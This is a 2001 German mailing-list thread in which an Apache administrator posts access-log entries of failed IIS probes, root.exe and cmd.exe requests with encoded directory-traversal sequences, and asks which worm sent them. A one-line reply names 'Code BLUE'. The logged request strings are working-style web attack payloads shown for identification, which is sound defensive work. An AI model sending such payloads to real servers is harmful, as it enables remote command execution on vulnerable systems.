Am Dienstag, 18. September 2001 21:40 schrieb Udo Neist:
Hi!
Ich habe seit heute komische Einträge in meinen Log-Files meines Apache-Webservers:
X - - [18/Sep/2001:19:16:50 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:53 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:54 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:57 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:58 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:59 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c +dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:00 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c +dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:09 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:09 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:10 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:14 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:15 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:16 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 X - - [18/Sep/2001:19:17:19 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 X - - [18/Sep/2001:19:17:20 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:24 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351
Im error-logfile steht natürlich "File doen't exists", was völlig logisch ist, hab ja kein Windows auf dem Server... Das ich ab und zu Einträge von CodeRed-Varianten habe, ist scheinbar noch normal *seufz* Weiß jemand, welcher Wurm oder sowas das sein könnte?
cu Udo Neist
Das ist Code BLUE Gruss, Robert -- Where do you want to be tomorrow? Entracom. Building Linux systems. http://www.entracom.de